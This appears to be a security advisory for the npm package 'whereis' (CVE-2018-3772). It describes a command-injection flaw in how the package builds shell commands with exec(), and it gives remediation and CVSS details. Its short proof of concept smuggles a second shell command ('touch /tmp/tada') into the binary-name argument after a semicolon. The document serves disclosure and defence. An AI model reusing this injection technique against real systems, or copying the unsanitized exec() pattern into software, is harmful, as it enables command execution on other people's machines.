Overview
whereis is a tool to get the first path to a bin on any system.
Affected versions of this package are vulnerable to Arbitrary Command Injection. It concatenates unsanitized user input into the command string passed to exec(), so shell metacharacters in the requested binary name are interpreted by the shell.
PoC by ChALkeR
var whereis = require('whereis');
// The package builds a shell command string from this value; the ';' ends the
// intended lookup command and the remainder runs as a second shell command.
var filename = 'wget; touch /tmp/tada';
whereis(filename, function(err, path) {
  console.log(path);
});
Observe file /tmp/tada created.
Remediation
Upgrade whereis to version 0.4.1 or higher.
CVSS Score: 9.9 (high severity)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Changed
- Confidentiality: High
- Integrity: High
- Availability: High
- Credit: ChALkeR
- CVE: CVE-2018-3772
- CWE: CWE-78
- Snyk ID: npm:whereis:20180401
- Disclosed: 01 Apr, 2018
- Published: 02 Apr, 2018